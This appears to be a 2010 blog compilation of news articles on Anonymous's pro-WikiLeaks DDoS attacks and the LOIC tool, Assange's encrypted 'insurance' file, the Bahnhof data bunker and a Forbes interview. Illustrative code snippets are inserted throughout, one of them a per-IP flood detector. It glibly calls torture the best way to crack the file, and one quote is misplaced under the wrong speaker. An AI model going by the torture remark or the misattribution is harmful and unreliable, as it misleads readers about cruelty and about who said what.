This article isn’t trying to make a moral judgment of their actions, but simply tries to explain what Anonymous is. Anonymous can’t be called an organization, because it isn’t organized. One could almost refer to it as a ‘disorganization’, if such a noun existed, due to its decentralized nature and lack of leadership. It’s more like a school of piranha which travel along with no leader or particular direction, until something attracts the school and they attack in unison. The first fish to see the target might momentarily lead the pack, but once the rest of the school becomes aware of the target, that leader becomes just another fish in the school. The concept of Anonymous is extremely difficult to explain, due to most people having a clear understanding of the usual structure of an organization. Companies have a CEO. Armies have generals. Countries have presidents or prime ministers or kings. In any case, there is always someone in charge; someone at the top with whom a face can be associated, and likewise credited or blamed.

Anonymous has no leader. It doesn’t even have sub-leaders. It has no face. It is an army comprised completely of foot soldiers, but each soldier knows the mission through a general pervasive awareness. It is also quite usual for not all of Anonymous to agree, and some members simply choose not to participate in whatever ongoing project the group is engaged in. There have even been times when Anonymous split and attacked both sides of an issue, and each other in the process. In his novel Prey, Michael Crichton wrote about the concept of decentralized groups, using nanobots as an example, and how they can be used to solve problems, or wreak havoc. It’s an entertaining and informative way to learn about decentralized systems. If you’re interested in understanding the concept, it’s a good place to start.
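
NOTE: the piranha-school idea can be caricatured in a few lines. A toy model with made-up numbers, not a description of any real system: independent agents, no leader, each acting on its own glimpse of a target plus the visible behaviour of its peers.

  // Each round an agent acts if it noticed the target itself, or if the
  // fraction of peers already acting has crossed its follow threshold.
  function school(agents: number, noticeProb: number, follow: number): number {
    let acting = 0;
    for (let round = 0; round < 50; round++) {
      let next = 0;
      for (let i = 0; i < agents; i++) {
        if (Math.random() < noticeProb || acting >= follow * agents) next++;
      }
      acting = next;
    }
    return acting;
  }

  console.log(school(1000, 0.05, 0.04)); // enough notice: the whole school turns
  console.log(school(1000, 0.02, 0.04)); // too few notice: only the noticing few act

The first fish to see the target leads only until the threshold is crossed; after that, the model cannot say who started it, which is rather the point.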

As for the motives of Anonymous, it is ostensibly for the laughs. Their targets range from Scientology to Iran to Habbo Hotel. They are just as likely to use their abilities to attack a children’s website as they are to help track down a pedophile. While it is tempting to attribute good intentions to the group, as most of their exploits fall on, or at least lean towards, the side of what the majority considers ‘right’, if they had an alignment it would be chaotic neutral. They usually don’t care whether the end results are good or bad; they just care that there are results.

Their main Internet social site is the /b/ board of 4chan. It is an imageboard where the posting of anything is permissible, aside from child pornography. However, that third rail of the site is regularly stepped on. If you go there, be prepared to see things you don’t want to see. Anonymous have been referred to as the “first Internet-based superconsciousness”, which is an apt description. Think of them as a brain, and the participating members as firing synapses. No one synapse controls the thought process, but when enough of a certain type fire in a particular pattern, the brain forms a thought, which is then acted on.

Anonymous have squarely come down on the side of WikiLeaks in the current dust-up. While they can be a powerful ally or a dreadful enemy, they generally lose interest when another topic that piques their interest comes along. It is hard to like or dislike them, since in a given year they are equally likely to do something which either outrages you or makes you want to cheer them on. I view them as one would a coin toss: equally likely to elate or disappoint, and truly not caring about the outcome.

A very short list of some of Anonymous’ work:
– Hacking Sarah Palin’s Yahoo! account
– Trolling Fox News
– Disagreeing with Gene Simmons of KISS

SHIFTING TACTICS
http://www.wired.com/threatlevel/2010/12/wikileaks-attacks-sputter/
Pro-WikiLeaks Attacks Sputter After Counterattacks, Dissent Over Tactics
by Ryan Singel / December 10, 2010

The attacks by pro-WikiLeaks supporters against companies that cut off services to the secret-spilling website fell into disarray Friday, as the attackers attempted to decide the future of the so-called “Operation Payback.” Much of the organization and communication among the group, which calls itself Anonymous, was taking place in chat rooms hosted on anonops.net. On Thursday, one room hosted more than 2,000 participants, while on Friday most of the rooms seemed to have been shut down by counterattacks. The few protesters able to connect — fewer than 100 on Friday — appeared to be devoting their energies to combating a counter-protester who kept blasting the message: “WHAT YOU’RE DOING IS ILLEGAL. STOP NOW AS YOU SUCK AT IT. WIKILEAKS SUCKS AS WELL.”

Adding to the confusion, the site anonops.info reported that its DNS provider, ENOM, had cut services to the domain hosting the chat channels, and that the operation was suffering from its own popularity as well as outside attacks. Still, the group is struggling on, and in a chat room that remained operable, one member asked protesters to register their votes for the next target using an embeddable Google form.

The group made headlines around the world Wednesday when the ragtag band of computer activists successfully overwhelmed both Visa.com and MasterCard.com, the homepages of the two giant payment processors. The attack cut off the ability to make donations to WikiLeaks using those companies’ cards. The companies said they cut WikiLeaks off after concluding that its publication of secret U.S. diplomatic cables provided by a whistleblower violated their terms of service, though the site has not been charged with a crime. The companies’ payment systems were not affected by the flood of traffic. Anonymous then shifted focus to PayPal — which had also shut off the ability to donate to WikiLeaks — and briefly disrupted the popular online payment firm by targeting its payment system directly.

The attacks aren’t hacks in the real sense of the word, since they don’t penetrate the companies’ computer systems and leave no lasting damage. They simply overwhelm servers with web requests in an attempt to make a site inaccessible to real users. The attacks on Visa.com and MasterCard.com were, in effect, an internet-age version of taking over a college campus building as a protest — potentially illegal, but leaving no lasting damage. That distinction was lost on many, and even the august New York Times used the word “cyberwar” in the lead sentence of its report on the attacks Thursday.
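To see why a flood of ordinary web requests is enough, consider a toy capacity model in Python. The figures below are invented for illustration and are not measurements of any site mentioned here; the point is simply that once offered load exceeds what the servers can answer, legitimate visitors are crowded out along with everyone else.

# Toy model: a site that can answer a fixed number of requests per second.
# All numbers are assumptions for illustration only.
capacity = 10_000      # requests/sec the site can actually serve
legitimate = 2_000     # requests/sec from real users

for flood in (0, 5_000, 50_000, 500_000):
    served = min(1.0, capacity / (legitimate + flood))
    print(f"flood {flood:>7}/s -> {served:.1%} of all requests get through")

At 50,000 junk requests per second, four out of five visitors, attacker and customer alike, get nothing back; the servers are untouched but the site is effectively gone.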

Parts of Anonymous seemed to realize the group was losing the propaganda war, a perception exacerbated by media reports that it would attack Amazon.com, which had cut WikiLeaks off from Amazon’s robust web-hosting service. In a press release, someone purporting to speak for the group tried to explain that the purpose of the attacks was to raise awareness, not to mess with Christmas shopping: “[T]he point of Operation: Payback was never to target critical infrastructure of any of the companies or organizations affected. Rather than doing that, we focused on their corporate websites, which is to say, their online ‘public face’. It is a symbolic action — as blogger and academic Evgeny Morozov put it, a legitimate expression of dissent.”

As for the reported attacks on Amazon.com, the press release said the group refrained because it didn’t want to be seen as disrupting Christmas. (An attack would likely not have had a chance against Amazon anyway, whose infrastructure is so good that it rents it out to other companies.) “Simply put, attacking a major online retailer when people are buying presents for their loved ones, would be in bad taste. The continuing attacks on PayPal are already tested and preferable: while not damaging their ability to process payments, they are successful in slowing their network down just enough for people to notice and thus, we achieve our goal of raising awareness.”

While these are smart public relations sentiments, the Anonymous attacks on PayPal, which started Wednesday night and continued (albeit at much smaller volume) into Friday morning, went after PayPal’s payment infrastructure (technically, its payment API, which merchants use to communicate with PayPal.com), not the website. Anonymous members made it clear in one heavily used chat room Thursday that they were gunning to shut PayPal down, not simply “slow down” the service.

Another communique, perhaps unofficial, re-published by BoingBoing Thursday night, announced that Anonymous would halt the denial-of-service attacks and instead turn its attention to the leaked cables. The idea was for Anonymous to spend its time looking for little-reported revelations in the cables, create videos and stories about them, and bombard sites, including YouTube, with links to them. The FBI has said it is looking into the attacks, and Dutch police have already arrested a 16-year-old boy in connection with them. Two people involved in Anonymous’ previous attacks on Scientology were convicted and jailed on charges of violating federal computer crime statutes. Those who join in the attacks using their own computers and IP addresses that can be traced back to them are making themselves very vulnerable to similar prosecutions. Few who are part of Anonymous are actual “hackers”; most join in the attacks by running specialized software provided by more technically adept members. Instructions for which sites to target, and when, are passed around dedicated online chat channels and websites, creating a sort of online insurgency.

Anonymous’ DDoS tool has an unusual twist, according to 3Crowd CEO and DDoS expert Barrett Lyon: it incorporates features that let members connect to the botnet voluntarily, rather than mobilizing hijacked zombie machines. The tool is called LOIC, which stands for “Low Orbit Ion Cannon,” and evolved from an open-source website load-testing utility. A new feature called Hivemind connects LOIC to anonops for instructions, allowing members to add their machines to an attack at will. In a further development, Anonymous members have also created a JavaScript version of the tool, dubbed JS LOIC, which only requires someone to connect to a webpage and press a button to turn their computer into a dedicated attacking machine. However, neither that site nor the downloaded software masks a user’s IP address, and the downloadable software has generated complaints from users that it sucks up all their available bandwidth when in attack mode.
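Since neither tool masks a participant’s IP address, even a rudimentary defense can pick the flood out of normal traffic. The following is a minimal sketch of the simplest such heuristic, a sliding-window request counter per source address. It is this editor’s illustration, not any of these companies’ actual mitigation, and the window and threshold are assumptions.

from collections import Counter, deque
import time

WINDOW = 10.0   # seconds of history to keep (assumed)
LIMIT = 200     # requests per window considered abnormal for one IP (assumed)

events = deque()     # (timestamp, ip) pairs, oldest first
counts = Counter()   # live request count per IP within the window

def record(ip, now=None):
    """Log one request; return True if this source should be throttled."""
    now = time.time() if now is None else now
    events.append((now, ip))
    counts[ip] += 1
    while events and now - events[0][0] > WINDOW:   # expire old entries
        _, old = events.popleft()
        counts[old] -= 1
    return counts[ip] > LIMIT

Anything this crude would flag unmasked LOIC traffic within seconds, which is exactly why participants attacking from home connections are so exposed.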


Elizabeth Cook’s artist impression of WikiLeaks founder Julian Assange’s appearance at Westminster Magistrates Court in London, where he was denied bail after appearing on an extradition warrant.

‘INSURANCE’
http://en.wikipedia.org/wiki/Kompromat
http://en.wikipedia.org/wiki/Dead_man%27s_switch
http://en.wikipedia.org/wiki/Rubber-hose_cryptanalysis
http://iq.org/~proff/marutukku.org/
http://caml.inria.fr/pub/ml-archives/caml-list/2000/08/6b8b195b3a25876e0789fe3db770db9f.en.html
http://www.bbc.co.uk/news/uk-11937110
http://wlcentral.org/node/505
http://www.theaustralian.com.au/in-depth/wikileaks/dont-shoot-messenger-for-revealing-uncomfortable-truths/story-fn775xjq-1225967241332
http://www.popsci.com/technology/article/2010-12/how-secure-julian-assanges-thermonuclear-insurance-file
How Secure Is Julian Assange’s Insurance File?
by Dan Nosowitz / 12.07.2010

Once your leader has been compared to a Bond villain, you might as well go all the way, right? A few months back, Wikileaks released a giant file that’s been referred to as the “thermonuclear” option, should the organization’s existence be threatened: A huge compendium of some of the most damaging secrets Wikileaks has collected, protected with an intense brand of secure encryption–for use as insurance. With Assange now in police custody on sex crimes charges, the “poison pill” is on everyone’s mind. The pill in question is a 1.4GB file, circulated by BitTorrent. It’s been downloaded tens of thousands of times, no mean feat for what, at the moment, is a giant file with absolutely no use whatsoever. It’s waiting on the hard drives of curious Torrenters, Wikileaks supporters, and (you can bet) government agents worldwide, awaiting the password that’ll open the file to all. Although no one is sure of its contents, the file is speculated to contain the full, un-redacted documents collected by the organization to date (including, some are guessing, new documents on Guantanamo Bay or regarding the financial crisis). It has yet to be cracked, at least not publicly, though there is a hefty amount of activity from those trying, at least a little, to break into it before Assange releases the key.

What makes this so pressing is Assange’s recent arrest in London on, to say the least, somewhat controversial sex crimes charges in Sweden. There’s been speculation that this could be the lead-up to more severe prosecution–certain American politicians have called for prosecuting Assange for “treason,” apparently not realizing or caring that Assange is an Australian national–and could in turn lead to his releasing the password for these documents. The file is titled “insurance.aes256,” implying that it’s protected with an AES 256-bit key, one of the strongest in the world. The thing is, there’s no reliable way to determine from the ciphertext alone which encryption was actually used. Though there’s no particular reason for Assange to lie about the security he used, it’s something to keep in mind. Let’s assume for the moment that it is indeed AES-256 encryption, which raises the question: What is AES?
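One caveat before turning to AES itself: while the cipher can’t be identified from the ciphertext, the container format sometimes can. Files produced by OpenSSL’s enc utility, one common way to make a file like this, begin with the eight-byte magic string “Salted__”. A quick Python check, assuming a local copy of the circulated file (whether it really is an OpenSSL container is, of course, exactly what nobody knows):

# Sketch: peek at the first 8 bytes of the circulated file (assumes a local copy).
with open("insurance.aes256", "rb") as f:
    magic = f.read(8)
if magic == b"Salted__":
    print("OpenSSL 'enc' container: an 8-byte salt follows; cipher and key still unknown")
else:
    print("No OpenSSL marker: raw ciphertext, or some other tool entirely")

Even a positive match tells you only the envelope, not the cipher or the key inside it.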

Advanced Encryption Standard
Advanced Encryption Standard, or AES, is a cipher standard that came into wide use in 2001. AES is a block cipher rather than a stream cipher, meaning “blocks” of data are converted into encrypted gibberish, 128 bits at a time. It’s perhaps the most-used block cipher in the world, employed by, for example, the Wi-Fi protection known as WPA2. It came to prominence after winning a contest held by the National Institute of Standards and Technology to find a new encryption standard, which led to its adoption by the NSA. That’s right: Assange’s “poison pill” is secured by the U.S. government’s own standard. Though AES is an open and public cipher, it’s the first to be approved by the NSA for “Top Secret” information, the classification used for the most sensitive material. It is, in short, a tremendously badass form of protection. An AES encryption doesn’t work like, say, a login. The keys are just strings of binary (in the case of AES-256, 256 binary digits) rather than words or characters, and entering the wrong key won’t simply disallow access — it’ll produce elaborately encoded gibberish. There are three variants of AES, which differ in the size of their keys (128, 192, or 256 bits), though they all use the same 128-bit block size. The size of the key has other implications within the algorithm itself (and slightly increases the encoding time), but mostly it increases the amount of time needed to break the cipher with what’s called a “brute force attack” (more on that in a bit). The three variants also run different numbers of “rounds.” Each round is a layer of further obscurity, making the original data all the more disguised. AES-128 has ten rounds, AES-192 has twelve, and AES-256 has fourteen. Those rounds make it effectively impossible to compare the ciphered data with its key and divine any sort of pattern, since the data has been so thoroughly mangled by, in this case, 14 rounds of highly sophisticated manipulation that it’s unrecognizable. The rounds make an already secure algorithm that much more secure.
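For the curious, here is what using AES-256 looks like in practice. This is a minimal sketch with the third-party Python cryptography package (an assumed dependency), illustrating the cipher in general rather than whatever tool actually produced the insurance file.

import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # 256 random bits, as in AES-256
nonce = os.urandom(12)                      # per-message nonce for GCM mode

plaintext = b"stand-in for something worth hiding"
ciphertext = AESGCM(key).encrypt(nonce, plaintext, None)

# A wrong key doesn't politely refuse access: in authenticated modes like GCM
# decryption raises an error, and in raw modes it yields exactly the
# "elaborately encoded gibberish" described above.
assert AESGCM(key).decrypt(nonce, ciphertext, None) == plaintext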

Possible Attacks
There are a few different ways of cracking a code like this. Many rely on some information besides the ciphertext itself. Side-channel attacks, for example, require observation of the actual decoding: data like the timing of deciphering, the power it takes to run the computer doing the deciphering, or even the noise the computer makes in the process. There are measures you can take to spoof this kind of thing, but even if Assange hasn’t, side-channel attacks won’t work in this case. Another kind of attack, the one that’s come closest, is the related-key attack. This method requires multiple keys, somehow related, working on the same cipher. Cryptographers have actually had some very limited success with related-key attacks, managing to greatly reduce the number of possible correct keys–but there are huge caveats to that. Related-key attacks require an advanced knowledge of the cipher and key that cryptographers never really have in the real world, like, say, a ciphered text and its deciphered counterpart. Most modern key-generation tools, like TrueCrypt and WPA2, have built-in protections against related-key attacks. And, worst of all, that success, which broke a 256-bit code, required a handicap: an altered encryption with fewer rounds. A related-key attack won’t work on Assange’s jacket-full-of-dynamite.

The time it takes to crack a code is thought of in terms of how many possible correct keys there could be. If you’re looking at a 256-bit key with no knowledge of anything, trying to enter every conceivable combination of 0s and 1s, you’d have a “time” of 2^256. Nobody measures the time it would take to crack one of these codes in hours, months, years, or centuries–it’s too big for all of that, so they just count combinations. Trying all of those combinations one by one is called, aptly, a brute force attack, and in a 256-bit instance like this one it’d take, roughly, a bajillion years to succeed (that being the scientific estimation). Even with all the supercomputers in the world working in concert, with a flawless algorithm for trying the different combinations, you’d be looking at something on the order of 10^50 years, many orders of magnitude longer than the age of the universe. Your average dude with an Alienware? Forget about it. In the related-key case above, the cryptographers only managed to narrow it down to 2^70 possibilities–and they only got through the 11th round. Besides, 2^70 combinations is, in real-world terms, not really much closer to cracked than 2^256. It’s still dramatically unfeasible.
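The arithmetic behind those claims is easy to check. A back-of-envelope calculation, with deliberately generous assumed guessing rates:

keyspace = 2 ** 256
supercomputers = 10 ** 18   # guesses/sec for every big machine on Earth combined (assumed, generous)
desktop = 10 ** 9           # guesses/sec for one enthusiast PC (assumed)
year = 60 * 60 * 24 * 365

print(f"full 2^256 sweep: {keyspace / supercomputers / year:.1e} years")
# -> ~3.7e+51 years, so "a bajillion" is barely an exaggeration

print(f"the weakened 2^70 case, one PC: {2**70 / desktop / year:,.0f} years")
# -> roughly 37,000 years: even the best published reduction stays out of reach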

The best possible method of cracking the code might be the simplest: Beat it out of him. This is, I swear to God, a real technique, called rubber-hose cryptanalysis. Assange is already in custody–the most efficient way to get his password is, by far, torture. It’s also authentic in that it’s the only type of cracking you’d actually see in a Bond movie. Sure as hell better than waiting several million years for a brute-force attack, right?

DUTCH TEEN ARRESTED for DDoS
http://www.wired.com/threatlevel/2010/12/wikileaks_anonymous_arrests/
http://www.theregister.co.uk/2010/12/09/wikileaks_ddos_arrest/
Dutch police arrest 16-year-old WikiLeaks avenger
by Dan Goodin / 9th December 2010

Dutch police said they have arrested a 16-year-old boy for participating in web attacks against MasterCard and Visa as part of a grassroots push to support WikiLeaks. A press release issued on Thursday (Google translation here) said the unnamed boy confessed to the distributed denial-of-service attacks after his computer gear was seized. He was arrested in The Hague, and is scheduled to be arraigned before a judge in Rotterdam on Friday. It is the first known report of an arrest in the ongoing attacks, which started earlier this week. The arrest came shortly after anonops.net, a Netherlands-hosted website used to coordinate attacks against companies perceived as harming WikiLeaks, was taken offline. A Panda Security researcher said the website was itself the victim of DDoS attacks, and the investigation by the Dutch High Tech Crime Team has also involved “digital data carriers,” according to the release, which didn’t specify what crimes the boy was charged with or say exactly what his involvement in the attacks was. According to researchers, the Low Orbit Ion Cannon tool, which thousands of WikiLeaks sympathizers are using to unleash the DDoS attacks, takes no steps to conceal its users’ IP addresses. It wouldn’t be surprising if attackers who used the application from internet connections at their home or work also received a call from local law enforcement agencies.

IMPACT ASSESSMENT
http://213.251.145.96/cablegate.html
http://edition.cnn.com/2010/OPINION/12/10/rushkoff.hacking.wikileaks/
Why WikiLeaks hackers are a glitch, not a cyberwar
by Douglas Rushkoff / December 10, 2010

Like a momentary glitch on a flat-panel display, the attacks by hackers calling themselves “Anonymous” came and went. Visa, PayPal, MasterCard and Amazon report no significant damage, and business goes on as usual. The corporations acting to cut off WikiLeaks remain safe. Although many are unsettled by the thought of a site such as WikiLeaks revealing state secrets or a group of anonymous hackers breaking the security of the banking system, events of the past week reveal that such threats are vastly overstated. If anything, the current debacle demonstrates just how tightly controlled the net remains in its current form, as well as just what would have to be done to create the sort of peer-to-peer network capable of upending corporate and government power over mass communication and society itself. While in the short term, WikiLeaks managed to create a public platform for a massive number of classified cables, the site itself was rather handily snuffed out by the people actually in charge of the internet. That’s because however decentralized the net might feel when we are posting to our blogs, it was actually designed around highly centralized indexes called domain name servers. Every time we instruct our browsers to find a web page, they ping one of these authorized master lists in order to know where to go. Removing WikiLeaks or any other site, group, top-level domain or entire nation is as easy as deleting it from that list.
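That centralized lookup is easy to see from code. In this minimal Python sketch, a name deleted from the index simply stops resolving, which is why WikiLeaks mirrors circulated the site’s raw IP address (note the numeric cablegate URL at the top of this section):

import socket

for host in ("wikileaks.org", "no-such-name.invalid"):
    try:
        # Walks the resolver chain: root servers -> TLD -> authoritative name server
        print(f"{host} -> {socket.gethostbyname(host)}")
    except socket.gaierror:
        print(f"{host} -> no entry in the index, so no way in by name")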

The durability of WikiLeaks’ disclosures rests less in the willingness of many rogue websites to attempt to host them in WikiLeaks’ stead than in the sanctity of traditional news outlets such as The New York Times and Guardian of London, which were also sent the complete package of classified documents and can’t be turned off with the online equivalent of a light switch. Likewise, the server space on which our websites appear is owned by corporations that have the power — if not the true right — to cut anyone off for any reason they choose. It’s private property, after all. Similarly, our means of funding WikiLeaks is limited to companies such as Visa and PayPal, which immediately granted government requests to freeze payments and donations to WikiLeaks. It’s the same way a rogue nation’s assets can be frozen by the banks holding them.

Hackers, angered at this affront to the supposed openness of the internet, then went on the attack. They used their own computers — as well as servers they had been able to commandeer — to wage “denial of service” attacks on the websites of the offending companies. Most of those companies, already armed with defensive capabilities designed to fend off intrusions from the likes of the Russian mob or the Red Army, survived unscathed. Only MasterCard was noticeably, if only temporarily, disrupted. Meanwhile, Facebook and Twitter quickly disabled accounts traced to those using the services to organize their minions.
And all this tamping down occurred on today’s purportedly “net neutral” internet, which offers no real advantage to one corporate-owned server over any other. We can only imagine the effect of these events on those who will decide whether to maintain net neutrality or give in to the corporations that argue the internet’s distributive capabilities should be reserved for those who can pay for such distribution, by the byte. No, the real lesson of the WikiLeaks affair and subsequent cyberattacks is not how unwieldy the net has become, but rather how its current architecture renders it so susceptible to control from above.

It was in one of the leaked cables that China’s State Council Information Office delivered its confident assessment that thanks to “increased controls and surveillance, like real-name registration … The Web is fundamentally controllable.” The internet’s failings as a truly decentralized network, however, merely point the way toward what a decentralized network might actually look like. Instead of being administered by central servers and corporate-owned server farms, it would operate through computers that ping one another and deliver web pages from anywhere, even our own computers. The FCC and other governing bodies may attempt to defang the threat of the original internet by ending net neutrality. But if they do, such a new network — a second, “people’s internet” — would almost certainly rise in its place. In the meantime, the internet we know, love and occasionally fear today is more of a beta version of a modeling platform than a revolutionary force. And like any new model, it changes the way we think of the way things work right now. What the internet lacks today indicates the possibilities for what can only be understood as a new operating system: a 21st-century, decentralized way of conducting political, commercial and human affairs.

This new operating system, even in its current form, is slowly becoming incompatible with the great, highly centralized institutions of the 20th century, such as central banking and nation states, which still depend on top-down control and artificial monopolies on power to maintain their authority over business and governance. The ease with which PayPal or Visa can cut off the intended recipient of our funds, for example, points the way to peer-to-peer transactions and even currencies that allow for the creation and transmission of value outside the traditional banking system. The ease with which a senator’s phone call can shut down a web site leads network architects to evaluate new methods of information distribution that don’t depend on corporate or government domain management for their effectiveness.
Until then, at the very least, the institutions still wielding power over the way our networks work and don’t work have to exercise their power under a new constraint: They must do so in the light of day.

INSIDE the WIKILEAKS BUNKER
http://cryptome.org/0002/ja-conspiracies.pdf
http://blogs.nature.com/news/thegreatbeyond/2010/12/us_government_wikileaks_respon.html
http://www.bbc.co.uk/news/world-europe-11968386
Going underground at the Wikileaks nerve centre
by Stephen Evans / 10 December 2010

To enter the old nuclear bunker in Stockholm where the Wikileaks secrets are stored is like passing into another surreal world, halfway between planet Earth and cyberspace. The entrance on the street is nondescript. It is just a door in a face of rock. Steam billows from pipes alongside into the bitterly cold Swedish air. If you press the bell and get invited in, glass doors open and you walk into a James Bond world of soft lighting. There is the high security of doors which open only when the door behind you has closed, and which need special passes for every few steps of the journey into the inner cavern. But there are also fountains of falling water and pot plants, because people work here, watching monitors from a control room. One of the carpets has the surface of the moon on it to give an added surreal effect.

And then there are the computer servers in a cave, with bare rock walls, underneath the wooden houses of Stockholm. In the inner cavern are rows and rows of computer storage cases, and on one of them are the files of Wikileaks, only a fraction of which have so far been made public, to the immense embarrassment of politicians who once said something indiscreet to an American diplomat, never dreaming the words would bite back in public. The data centre is owned by a company called Bahnhof, and its founder, Jon Karlung, gave the BBC a tour. Mr Karlung took over the Cold War remnant in 2007 and had to dynamite out a further 4,000 cubic metres of rock to make it big enough. It is ultra-secure, and submarine turbines just inside the entrance generate enough power to maintain a moderate temperature even in the vicious Swedish winter.

But the threat to the data is not physical theft – robbers with guns would have a hard job – but cyber attack. Mr Karlung said they monitored the traffic into and out of the centre, but that he would be naive to think people would not try, so they had given Wikileaks a separate channel in – its own pipe for data, as it were. Does he fear the wrath of the United States because his facility stores such embarrassing information? “Our role must be to keep this service up. We are in Sweden and this service is legal in Sweden and therefore we must stand up for our client,” he said. “We must do everything in our power to keep the service up. I believe in the freedom of speech.” He said his data centre was like the postal service: you do not blame the postman for the content of the letter, nor do you open the letter if you are a postal delivery person. So it is with servers, he thinks: “We should be able to help Wikileaks operate their servers as long as they are not violating any laws. That principle is the most important thing to stand for.”

“At the moment, for example, we are sitting on 5GB from Bank of America, one of the executive’s hard drives…”

U.S. BANKERS NEXT?
http://www.computerworld.com/s/article/9139180/Wikileaks_plans_to_make_the_Web_a_leakier_place
http://news.cnet.com/8301-27080_3-10450552-245.html
http://news.cnet.com/8301-31921_3-20011106-281.html
http://www.wired.com/threatlevel/2010/09/wikileaks-revolt/
http://www.digitaltrends.com/computing/wikileaks-defectors-form-openleaks-org/
http://www.guardian.co.uk/world/blog/2010/dec/03/julian-assange-wikileaks
http://blogs.forbes.com/andygreenberg/2010/11/29/an-interview-with-wikileaks-julian-assange/
An Interview With WikiLeaks’ Julian Assange
by Andy Greenberg / Nov. 29 2010

Admire him or revile him, WikiLeaks’ Julian Assange is the prophet of a coming age of involuntary transparency, the leader of an organization devoted to divulging the world’s secrets using technology unimagined a generation ago. Over the last year his information insurgency has dumped 76,000 secret Afghan war documents and another trove of 392,000 files from the Iraq war into the public domain–the largest classified military security breaches in history. Sunday, WikiLeaks made the first of 250,000 classified U.S. State Department cables public, offering an unprecedented view of how America’s top diplomats view enemies and friends alike. But, as Assange explained to me earlier this month, the Pentagon and State Department leaks are just the start.

Forbes: To start, is it true you’re sitting on a trove of unpublished documents?
Julian Assange: Sure. That’s usually the case. As we’ve gotten more successful, there’s a gap between the speed of our publishing pipeline and the speed of our receiving submissions pipeline. Our pipeline of leaks has been increasing exponentially as our profile rises, and our ability to publish is increasing linearly.
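The mismatch he describes is purely a matter of growth rates; a toy calculation with invented numbers shows how quickly an exponential inflow outruns a linear publishing capacity:

received, published, backlog = 100.0, 100.0, 0.0   # per quarter, assumed equal at the start
for quarter in range(1, 9):
    backlog += received - published
    print(f"Q{quarter}: received {received:>6.0f}, published {published:.0f}, backlog {backlog:>6.0f}")
    received *= 2        # submissions double each quarter (exponential, assumed)
    published += 20      # publishing capacity grows by a fixed step (linear, assumed)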

Q. You mean as your personal profile rises?
A. Yeah, the rising profile of the organization and my rising profile also. And there’s a network effect for anything to do with trust. Once something starts going around and being considered trustworthy in a particular arena, and you meet someone and they say “I heard this is trustworthy,” then all of a sudden it reconfirms your suspicion that the thing is trustworthy. So that’s why brand is so important, just as it is with anything you have to trust.

Q. And this gap between your publishing resources and your submissions is why the site’s submission function has been down since October?
A. We have too much.

Q. Before you turned off submissions, how many leaks were you getting a day?
A. As I said, it was increasing exponentially. When we get lots of press, we can get a spike of hundreds or thousands. The quality is sometimes not as high. If the front page of the Pirate Bay links to us, as they have done on occasion, we can get a lot of submissions, but the quality is not as high.

Q. How much of this trove of documents that you’re sitting on is related to the private sector?
A. About fifty percent.

Q. You’ve been focused on the U.S. military mostly in the last year. Does that mean you have private sector-focused leaks in the works?
A. Yes. If you think about it, we have a publishing pipeline that’s increasing linearly, and an exponential number of leaks, so we’re in a position where we have to prioritize our resources so that the biggest impact stuff gets released first.

Q. So do you have very high impact corporate stuff to release then?
A. Yes, but maybe not as high impact… I mean, it could take down a bank or two.

Q. That sounds like high impact.
A. But not as big an impact as the history of a whole war. But it depends on how you measure these things.

Q. When will WikiLeaks return to its older model of more frequent leaks of smaller amounts of material?
A. If you look at the average number of documents we’re releasing, we’re vastly exceeding what we did last year. These are huge datasets. So it’s actually very efficient for us to do that. If you look at the number of packages, the number of packages has decreased. But if you look at the average number of documents, that’s tremendously increased.

Q. So will you return to the model of higher number of targets and sources?
A. Yes. Though I do actually think… [pauses] These big package releases. There should be a cute name for them.

Q. Megaleaks?
A. Megaleaks. That’s good. These megaleaks… They’re an important phenomenon, and they’re only going to increase. When there’s a tremendous dataset, covering a whole period of history or affecting a whole group of people, that’s worth specializing on and doing a unique production for each one, which is what we’ve done. We’re totally source dependent. We get what we get. As our profile rises in a certain area, we get more in a particular area. People say, why don’t you release more leaks from the Taliban. So I say hey, help us, tell more Taliban dissidents about us.

Q. These megaleaks, as you call them, we haven’t seen any of those from the private sector.
A. No, not at the same scale as for the military.

Q. Will we?
A. Yes. We have one related to a bank coming up, that’s a megaleak. It’s not as big a scale as the Iraq material, but it’s either tens or hundreds of thousands of documents depending on how you define it.

Q. Is it a U.S. bank?
A. Yes, it’s a U.S. bank.

Q. One that still exists?
A. Yes, a big U.S. bank.

Q. The biggest U.S. bank?
A. No comment.

Q. When will it happen?
A. Early next year. I won’t say more.

Q. What do you want to be the result of this release?
A. [Pauses] I’m not sure. It will give a true and representative insight into how banks behave at the executive level in a way that will stimulate investigations and reforms, I presume. Usually when you get leaks at this level, it’s about one particular case or one particular violation. For this, there’s only one similar example. It’s like the Enron emails. Why were these so valuable? When Enron collapsed, through court processes, thousands and thousands of emails came out that were internal, and it provided a window into how the whole company was managed. It was all the little decisions that supported the flagrant violations. This will be like that. Yes, there will be some flagrant violations, unethical practices that will be revealed, but it will also be all the supporting decision-making structures and the internal executive ethos that comes out, and that’s tremendously valuable. Like the Iraq War Logs: yes, there were mass casualty incidents that were very newsworthy, but the great value is seeing the full spectrum of the war. You could call it the ecosystem of corruption. But it’s also all the regular decision making that turns a blind eye to and supports unethical practices: the oversight that’s not done, the priorities of executives, how they think they’re fulfilling their own self-interest. The way they talk about it.

Q. How many dollars were at stake in this?
A. We’re still investigating. All I can say is it’s clear there were unethical practices, but it’s too early to suggest there’s criminality. We have to be careful about applying criminal labels to people until we’re very sure.

Q. Can you tell me anything about what kind of unethical behavior we’re talking about?
A. No.

Q. You once said to one of my colleagues that WikiLeaks has material on BP. What have you got?
A. We’ve got lots now, but we haven’t determined how much is original. There’s been a lot of press on the BP issue, and lawyers, and people are pulling out a lot of stuff. So I suspect the material we have on BP may not be that original. We’ll have to see whether our stuff is especially unique.

Q. The Russian press has reported that you plan to target Russian companies and politicians. I’ve heard from other WikiLeaks sources that this was blown out of proportion.
A. It was blown out of proportion when the FSB reportedly said not to worry, that they could take us down. But yes, we have material on many business and governments, including in Russia. It’s not right to say there’s going to be a particular focus on Russia.

Q. Let’s just walk through other industries. What about pharmaceutical companies?
A. Yes. To be clear, we have so much unprocessed stuff, I’m not even sure about all of it. These are just things I’ve briefly looked at or that one of our people has told me about.

Q. How much stuff do you have? How many gigs or terabytes?
A. I’m not sure. I haven’t had time to calculate.

Q. Continuing then: The tech industry?
A. We have some material on spying by a major government on the tech industry. Industrial espionage.

Q. U.S.? China?
A. The U.S. is one of the victims.

Q. What about the energy industry?
A. Yes.

Q. Aside from BP?
A. Yes.

Q. On environmental issues?
A. A whole range of issues.

Q. Can you give me some examples?
